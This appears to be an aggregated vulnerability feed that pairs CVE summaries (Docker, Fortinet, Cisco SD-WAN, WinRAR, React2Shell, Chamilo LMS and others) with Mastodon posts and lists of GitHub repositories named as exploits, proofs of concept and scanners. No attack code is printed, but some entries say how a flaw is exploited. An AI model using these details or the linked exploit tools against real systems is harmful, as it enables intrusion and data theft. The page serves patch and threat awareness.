##

CVE-2026-34040
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-03T16:51:28.670000

1 posts

Moby is an open source container framework. Prior to version 29.3.1, a security vulnerability has been detected that allows attackers to bypass authorization plugins (AuthZ). This issue has been patched in version 29.3.1.

benzogaga33@mamot.fr at 2026-04-09T09:40:03.000Z ##

Docker : la faille CVE-2026-34040 permet d’obtenir un accès root sur l’hôte ! it-connect.fr/docker-la-faille #ActuCybersécurité #Cybersécurité #Vulnérabilité #Docker

##

CVE-2026-34504
(8.3 HIGH)

EPSS: 0.05%

updated 2026-04-02T12:20:31.950000

2 posts

OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.

vitobotta@mastodon.social at 2026-04-10T18:37:59.000Z ##

From over a week ago but anyway, CVE-2026-34504 in OpenClaw's image generation pipeline is a reminder that AI agent frameworks inherit all the classic web vulnerabilities plus their own unique attack surface.

An SSRF in the Fal provider means a malicious relay can have the agent fetch internal URLs and leak metadata through the generated output.

I switched from OpenClaw to Hermes Agent a couple of weeks ago, and I need to explore in detail how Hermes handles this stuff.

##
vitobotta@mastodon.social at 2026-04-10T18:37:59.000Z ##

From over a week ago but anyway, CVE-2026-34504 in OpenClaw's image generation pipeline is a reminder that AI agent frameworks inherit all the classic web vulnerabilities plus their own unique attack surface.

An SSRF in the Fal provider means a malicious relay can have the agent fetch internal URLs and leak metadata through the generated output.

I switched from OpenClaw to Hermes Agent a couple of weeks ago, and I need to explore in detail how Hermes handles this stuff.

##

CVE-2026-21643
(9.8 CRITICAL)

EPSS: 13.70%

updated 2026-03-30T13:16:22.063000

1 posts

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiClientEMS 7.4.4 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

Nuclei template

2 repos

https://github.com/0xBlackash/CVE-2026-21643

https://github.com/alirezac0/CVE-2026-21643

PC_Fluesterer@social.tchncs.de at 2026-04-11T10:47:43.000Z ##

Noch ein Notfall-Update bei Fortinet

Mal etwas ganz neues - ach nein, ist ja leider nicht neu, sondern fast normal. Der US-Hersteller von Geräten für den Netzwerk-Perimeter Fortinet musste schon wieder ein Notfall-Update veröffentlichen. Die damit geflickte Sicherheiitslücke CVE-2026-35616 wird mindestens seit Ende März bereits für Angriffe ausgenutzt (Zero-Day Exploit). Das ist schon der zweite Zero-Day innerhalb weniger Wochen. Bereits im März musste CVE-2026-21643 geflickt werden. Wiederholung: Wer das Intranet gegen das wilde wüste Internet schützen möchte, muss zu FOSS greifen.

pc-fluesterer.info/wordpress/2

#Allgemein #Empfehlung #Hintergrund #Warnung #0day #closedsource #cybercrime #exploits #hersteller #sicherheit #UnplugTrump #usa

##

CVE-2026-27654
(8.2 HIGH)

EPSS: 0.03%

updated 2026-03-24T15:30:36

2 posts

NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_dav_module module that might allow an attacker to trigger a buffer overflow to the NGINX worker process; this vulnerability may result in termination of the NGINX worker process or modification of source or destination file names outside the document root. This issue affects NGINX Open Source and NGINX Plus when the configuratio

1 repos

https://github.com/JohannesLks/CVE-2026-27654

_r_netsec at 2026-04-11T00:28:05.884Z ##

Claude + Humans vs nginx: CVE-2026-27654 blog.calif.io/p/claude-humans-

##
_r_netsec@infosec.exchange at 2026-04-11T00:28:05.000Z ##

Claude + Humans vs nginx: CVE-2026-27654 blog.calif.io/p/claude-humans-

##

CVE-2026-32011
(7.5 HIGH)

EPSS: 0.06%

updated 2026-03-20T21:13:05

1 posts

## Impact OpenClaw webhook handlers for BlueBubbles and Google Chat accepted and parsed request bodies before authentication and signature checks on vulnerable releases. This allowed unauthenticated clients to hold parser work open with slow/oversized request bodies and degrade availability (slow-request DoS). ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected releases: `<=

EUVD_Bot@mastodon.social at 2026-04-10T17:03:11.000Z ##

🚨 EUVD-2026-21476

📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-10

📝 OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-32011 where the Feishu webhook handler accepts request bodies with permissive limits of 1MB and 30-second timeout before signature verification. An unauthenticated attacker can exh...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2026-3497(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-03-18T21:34:00

1 posts

Vulnerability in the OpenSSH GSSAPI delta included in various Linux distributions. This vulnerability affects the GSSAPI patches added by various Linux distributions and does not affect the OpenSSH upstream project itself. The usage of sshpkt_disconnect() on an error, which does not terminate the process, allows an attacker to send an unexpected GSSAPI message type during the GSSAPI key exchange t

linux@activitypub.awakari.com at 2026-04-09T20:34:10.000Z ## Debian OpenSSH Critical DSA-6204-1 CVE-2026-3497 Remote DoS Execution Jeremy Brown discovered a flaw in the GSSAPI Key Exchange patch applied in Debian to OpenSSH, an implementation of the SSH prot...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-23060
(5.5 MEDIUM)

EPSS: 0.01%

updated 2026-03-13T21:32:48

1 posts

In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than the minimum expected length, crypto_authenc_esn_decrypt() can advance past the end of the destination scatterlist and trigger a NULL pointer dereference in scatterwalk_map_and_co

linux@activitypub.awakari.com at 2026-04-08T21:07:12.000Z ## Ubuntu 25.10 Kernel Critical Flaws USN-8149-2 CVE-2026-23060 DoS Several security issues were fixed in the Linux kernel.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-20127
(10.0 CRITICAL)

EPSS: 39.66%

updated 2026-02-25T18:31:45

2 posts

A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not

6 repos

https://github.com/abrahamsurf/sdwan-scanner-CVE-2026-20127

https://github.com/sfewer-r7/CVE-2026-20127

https://github.com/BugFor-Pings/CVE-2026-20127_EXP

https://github.com/yonathanpy/CVE-2026-20127-Cisco-SD-WAN-Preauth-RCE

https://github.com/zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE

https://github.com/randeepajayasekara/CVE-2026-20127

metasploit at 2026-04-10T21:23:33.820Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##
metasploit@infosec.exchange at 2026-04-10T21:23:33.000Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

CVE-2026-27486(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-23T22:28:51

1 posts

## Summary OpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: `< 2026.2.14` (including the latest published versi

EUVD_Bot@mastodon.social at 2026-04-10T17:03:10.000Z ##

🚨 EUVD-2026-21480

📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-10

📝 OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-27486 where the !stop chat command uses an unpatched killProcessTree function from shell-utils.ts that sends SIGKILL immediately without graceful SIGTERM shutdown. Attackers can tr...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 71.80%

updated 2026-01-30T00:31:29

1 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

2 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

https://github.com/YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

secdb@infosec.exchange at 2026-04-08T20:00:14.000Z ##

🚨 [CISA-2026:0408] CISA Adds One Known Exploited Vulnerability to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-1340 (secdb.nttzen.cloud/cve/detail/)
- Name: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Ivanti
- Product: Endpoint Manager Mobile (EPMM)
- Notes: Please adhere to Ivanti&#39;s guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: hub.ivanti.com/s/article/Secur ; support.mobileiron.com/mi/vsp/ ; support.mobileiron.com/mi/vsp/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260408 #cisa20260408 #cve_2026_1340 #cve20261340

##

CVE-2026-22200
(7.5 HIGH)

EPSS: 74.45%

updated 2026-01-27T21:31:40

2 posts

Enhancesoft osTicket versions up to and including 1.18.2 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the g

Nuclei template

2 repos

https://github.com/horizon3ai/CVE-2026-22200

https://github.com/Remnant-DB/CVE-2026-22200

metasploit at 2026-04-10T21:23:33.820Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##
metasploit@infosec.exchange at 2026-04-10T21:23:33.000Z ##

This week's release features a 2x faster msfvenom bootup time and new modules, including exploits for the Cisco Catalyst SD-WAN Controller Authentication Bypass (CVE-2026-20127) and osTicket Arbitrary File Read (CVE-2026-22200). rapid7.com/blog/post/pt-metasp

##

CVE-2025-68161(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-12-19T22:08:03

1 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the [verifyHostName](https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) configuration attribute or the [log4j2.sslVerifyHostName](https://logging.apache.org/log4j/2.x/manual/systemproperties

EUVD_Bot@mastodon.social at 2026-04-10T17:01:09.000Z ##

🚨 EUVD-2026-21407

📊 Score: 6.3/10 (CVSS v3.1)
📦 Product: Apache Log4j Core, Apache Log4j Core
🏢 Vendor: Apache Software Foundation
📅 Updated: 2026-04-10

📝 The fix for CVE-2025-68161 logging.apache.org/security.ht was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2025-6218
(7.8 HIGH)

EPSS: 4.76%

updated 2025-12-09T21:31:29

1 posts

RARLAB WinRAR Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of RARLAB WinRAR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of file paths within archive files. A

6 repos

https://github.com/absholi7ly/CVE-2025-6218-WinRAR-Directory-Traversal-RCE

https://github.com/speinador/CVE-2025-6218_WinRAR

https://github.com/ignis-sec/CVE-2025-6218

https://github.com/Chrxstxqn/CVE-2025-6218-WinRAR-RCE-POC

https://github.com/skimask1690/CVE-2025-6218-POC

https://github.com/mulwareX/CVE-2025-6218-POC

VirusBulletin@infosec.exchange at 2026-04-10T09:27:13.000Z ##

Robin Dost analyses a fresh UAC-0226 sample from 9 April 2026 and identifies it as a GIFTEDCROOK stealer variant. The chain starts with CVE-2025-6218 and CVE-2025-8088, then uses a LNK to launch a payload that decodes another binary, uses chunked data exfiltration, and reconstructs its C2 at runtime. blog.synapticsystems.de/obfusc

##

CVE-2025-55182
(10.0 CRITICAL)

EPSS: 84.89%

updated 2025-12-09T16:53:25

2 posts

### Impact There is an unauthenticated remote code execution vulnerability in React Server Components. We recommend upgrading immediately. The vulnerability is present in versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of: * [react-server-dom-webpack](https://www.npmjs.com/package/react-server-dom-webpack) * [react-server-dom-parcel](https://www.npmjs.com/package/react-server-dom-parcel) * [react-s

Nuclei template

100 repos

https://github.com/MoLeft/React2Shell-Toolbox

https://github.com/ynsmroztas/NextRce

https://github.com/anuththara2007-W/CVE-2025-55182-Exploit-extension

https://github.com/mrknow001/RSC_Detector

https://github.com/freeqaz/react2shell

https://github.com/zzhorc/CVE-2025-55182

https://github.com/im-ezboy/CVE-2025-55182-zoomeye

https://github.com/AdityaBhatt3010/React2Shell-CVE-2025-55182

https://github.com/snipevx/React2Shell-POC

https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension

https://github.com/alptexans/RSC-Detect-CVE-2025-55182

https://github.com/surajhacx/react2shellpoc

https://github.com/assetnote/react2shell-scanner

https://github.com/Spritualkb/CVE-2025-55182-exp

https://github.com/techgaun/cve-2025-55182-scanner

https://github.com/shyambhanushali/React2Shell

https://github.com/santihabib/CVE-2025-55182-analysis

https://github.com/xalgord/React2Shell

https://github.com/sickwell/CVE-2025-55182

https://github.com/AdityaBhatt3010/React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web

https://github.com/ejpir/CVE-2025-55182-research

https://github.com/CirqueiraDev/MassExploit-CVE-2025-55182

https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-

https://github.com/zack0x01/vuln-app-CVE-2025-55182

https://github.com/sumanrox/rschunter

https://github.com/Archerkong/CVE-2025-55182

https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell

https://github.com/rix4uni/CVE-2025-55182

https://github.com/acheong08/CVE-2025-55182-poc

https://github.com/hexsh1dow/CVE-2025-55182

https://github.com/c0rydoras/CVE-2025-55182

https://github.com/hoosin/CVE-2025-55182

https://github.com/chrahman/react2shell-CVE-2025-55182-full-rce-script

https://github.com/msanft/CVE-2025-55182

https://github.com/songsanggggg/CVE-2025-55182

https://github.com/ZihxS/check-react-rce-cve-2025-55182

https://github.com/l4rm4nd/CVE-2025-55182

https://github.com/xkillbit/cve-2025-55182-scanner

https://github.com/hackersatyamrastogi/react2shell-ultimate

https://github.com/StealthMoud/CVE-2025-55182-Scanner

https://github.com/kondukto-io/vulnerable-next-js-poc

https://github.com/cybertechajju/R2C-CVE-2025-55182-66478

https://github.com/heiheishushu/rsc_detect_CVE-2025-55182

https://github.com/dwisiswant0/CVE-2025-55182

https://github.com/Chocapikk/CVE-2025-55182

https://github.com/momika233/CVE-2025-55182-bypass

https://github.com/MemerGamer/CVE-2025-55182

https://github.com/CymulateResearch/React2Shell-Scanner

https://github.com/kavienanj/CVE-2025-55182

https://github.com/RuoJi6/CVE-2025-55182-RCE-shell

https://github.com/aliclub0x00/CVE-2025-55182-POC-NEXTJS

https://github.com/theori-io/reactguard

https://github.com/pax-k/react2shell-CVE-2025-55182-full-rce-script

https://github.com/alfazhossain/CVE-2025-55182-Exploiter

https://github.com/vulncheck-oss/cve-2025-55182

https://github.com/Rsatan/Next.js-Exploit-Tool

https://github.com/gensecaihq/react2shell-scanner

https://github.com/alsaut1/react2shell-lab

https://github.com/websecuritylabs/React2Shell-Library

https://github.com/theman001/CVE-2025-55182

https://github.com/yanoshercohen/React2Shell_CVE-2025-55182

https://github.com/hualy13/CVE-2025-55182

https://github.com/jctommasi/react2shellVulnApp

https://github.com/LemonTeatw1/CVE-2025-55182-exploit

https://github.com/zr0n/react2shell

https://github.com/GelukCrab/React-Server-Components-RCE

https://github.com/Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

https://github.com/pyroxenites/Nextjs_RCE_Exploit_Tool

https://github.com/keklick1337/CVE-2025-55182-golang-PoC

https://github.com/Cillian-Collins/CVE-2025-55182

https://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js

https://github.com/BeichenDream/CVE-2025-55182-GodzillaMemoryShell

https://github.com/timsonner/React2Shell-CVE-2025-55182

https://github.com/nehkark/CVE-2025-55182

https://github.com/sudo-Yangziran/CVE-2025-55182POC

https://github.com/Updatelap/CVE-2025-55182

https://github.com/whiteov3rflow/CVE-2025-55182-poc

https://github.com/ThemeHackers/CVE-2025-55182

https://github.com/shamo0/react2shell-PoC

https://github.com/Dh4v4l8/CVE-2025-55182-poc-tool

https://github.com/xcanwin/CVE-2025-55182-React-RCE

https://github.com/jf0x3a/CVE-2025-55182-exploit

https://github.com/kOaDT/poc-cve-2025-55182

https://github.com/VeilVulp/RscScan-cve-2025-55182

https://github.com/subhdotsol/CVE-2025-55182

https://github.com/emredavut/CVE-2025-55182

https://github.com/AliHzSec/CVE-2025-55182

https://github.com/Tiger-Foxx/exploit-react-CVE-2025-55182

https://github.com/logesh-GIT001/CVE-2025-55182

https://github.com/Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-

https://github.com/vijay-shirhatti/RSC-Detect-CVE-2025-55182

https://github.com/ejpir/CVE-2025-55182-bypass

https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC

https://github.com/Pizz33/CVE-2025-55182-burpscanner

https://github.com/fatguru/CVE-2025-55182-scanner

https://github.com/EynaExp/CVE-2025-55182-POC

https://github.com/hidden-investigations/react2shell-scanner

https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

https://github.com/MrR0b0t19/CVE-2025-55182-shellinteractive

https://github.com/BlackTechX011/React2Shell

hackmag@infosec.exchange at 2026-04-09T20:30:03.000Z ##

⚪️ React2Shell vulnerability used for automated credential theft

🗨️ Cisco Talos researchers have discovered a large-scale campaign for automated credential theft exploiting the React2Shell vulnerability (CVE-2025-55182). In just 24 hours, the attackers managed to compromise 766 hosts across various cloud providers worldwide and steal database passwords, AWS keys,…

🔗 hackmag.com/news/react2shell-i

#news

##
oversecurity@mastodon.social at 2026-04-09T14:42:42.000Z ##

CVE-2025-55182 Exploitation Hits the Smart Home

Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network...

🔗️ [Bitdefender] link.is.it/jU5kX8

##

CVE-2025-8088
(8.8 HIGH)

EPSS: 7.05%

updated 2025-10-22T00:34:26

1 posts

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.

32 repos

https://github.com/nuky-alt/CVE-2025-8088

https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC

https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR

https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool

https://github.com/nhattanhh/CVE-2025-8088

https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document

https://github.com/travisbgreen/cve-2025-8088

https://github.com/techcorp/CVE-2025-8088-Exploit

https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit

https://github.com/ghostn4444/CVE-2025-8088

https://github.com/undefined-name12/CVE-2025-8088-Winrar

https://github.com/walidpyh/CVE-2025-8088

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC

https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder

https://github.com/hbesljx/CVE-2025-8088-EXP

https://github.com/pescada-dev/-CVE-2025-8088

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

https://github.com/shaheeryasirofficial/CVE-2025-8088

https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition

https://github.com/Jessica74016/CVE-2025-8088

https://github.com/jordan922/CVE-2025-8088

https://github.com/IsmaelCosma/CVE-2025-8088

https://github.com/Syrins/CVE-2025-8088-Winrar-Tool-Gui

https://github.com/Markusino488/cve-2025-8088

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

https://github.com/lennertdefauw/CVE-2025-8088

https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability

https://github.com/starfallreverie/winrar-exploit

https://github.com/pentestfunctions/best-CVE-2025-8088

https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

https://github.com/ilhamrzr/RAR-Anomaly-Inspector

VirusBulletin@infosec.exchange at 2026-04-10T09:27:13.000Z ##

Robin Dost analyses a fresh UAC-0226 sample from 9 April 2026 and identifies it as a GIFTEDCROOK stealer variant. The chain starts with CVE-2025-6218 and CVE-2025-8088, then uses a LNK to launch a payload that decodes another binary, uses chunked data exfiltration, and reconstructs its C2 at runtime. blog.synapticsystems.de/obfusc

##

CVE-2024-27297
(6.3 MEDIUM)

EPSS: 0.05%

updated 2025-06-27T13:15:23.240000

1 posts

Nix is a package manager for Linux and other Unix systems. A fixed-output derivations on Linux can send file descriptors to files in the Nix store to another program running on the host (or another fixed-output derivation) via Unix domain sockets in the abstract namespace. This allows to modify the output of the derivation, after Nix has registered the path as "valid" and immutable in the Nix data

thehackerwire@mastodon.social at 2026-04-09T05:00:05.000Z ##

🔴 CVE-2026-39860 - Critical (9)

Nix is a package manager for Linux and other Unix systems. A bug in the fix for CVE-2024-27297 allowed for arbitrary overwrites of files writable by the Nix process orchestrating the builds (typically the Nix daemon running as root in multi-user i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-34359
(9.6 CRITICAL)

EPSS: 56.67%

updated 2024-11-21T09:18:30.130000

1 posts

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also load

yayafa@jforo.com at 2026-04-08T21:51:15.000Z ##

Llama Drama:AIアプリ開発用Pythonパッケージに重大な欠陥 システムやデータが侵害される恐れ(CVE-2024-34359) | Codebook|Security News yayafa.com/2776397/ #AgenticAi #AI #ArtificialGeneralIntelligence #ArtificialIntelligence #LLAMA #Meta #MetaAI #エージェント型AI #人工知能 #汎用人工知能

##

CVE-2020-8562
(2.2 LOW)

EPSS: 0.06%

updated 2024-11-21T05:39:02.180000

1 posts

As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or

raesene@infosec.exchange at 2026-04-09T10:57:06.000Z ##

Next in my series of blogs on unpatchable Kubernetes vulnerabilities is out. This time it's about TOCTOUs and SSRF

securitylabs.datadoghq.com/art

##

CVE-2026-32892
(0 None)

EPSS: 0.19%

4 posts

N/A

offseq at 2026-04-11T06:00:27.091Z ##

Chamilo LMS CRITICAL vuln (CVE-2026-32892): OS Command Injection via move_to POST param in fileManage.lib.php. Auth'd teachers can run arbitrary commands as www-data. Patch: 1.11.38/2.0.0-RC.3. Details: radar.offseq.com/threat/cve-20

##
thehackerwire@mastodon.social at 2026-04-11T06:00:07.000Z ##

🔴 CVE-2026-32892 - Critical (9.1)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values direct...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-11T06:00:27.000Z ##

Chamilo LMS CRITICAL vuln (CVE-2026-32892): OS Command Injection via move_to POST param in fileManage.lib.php. Auth'd teachers can run arbitrary commands as www-data. Patch: 1.11.38/2.0.0-RC.3. Details: radar.offseq.com/threat/cve-20 #OffSeq #Chamilo #CVE202632892 #infosec

##
thehackerwire@mastodon.social at 2026-04-11T06:00:07.000Z ##

🔴 CVE-2026-32892 - Critical (9.1)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values direct...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31940
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:03:39.000Z ##

🟠 CVE-2026-31940 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:03:39.000Z ##

🟠 CVE-2026-31940 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31939
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:03:30.000Z ##

🟠 CVE-2026-31939 - High (8.3)

Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without ca...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:03:30.000Z ##

🟠 CVE-2026-31939 - High (8.3)

Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without ca...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33618
(0 None)

EPSS: 0.05%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T05:00:19.000Z ##

🟠 CVE-2026-33618 - High (8.8)

Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:00:19.000Z ##

🟠 CVE-2026-33618 - High (8.8)

Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33710
(0 None)

EPSS: 0.03%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:49:08.000Z ##

🟠 CVE-2026-33710 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the for...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:49:08.000Z ##

🟠 CVE-2026-33710 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the for...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-32252
(0 None)

EPSS: 0.02%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-11T04:48:59.000Z ##

🟠 CVE-2026-32252 - High (7.7)

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:48:59.000Z ##

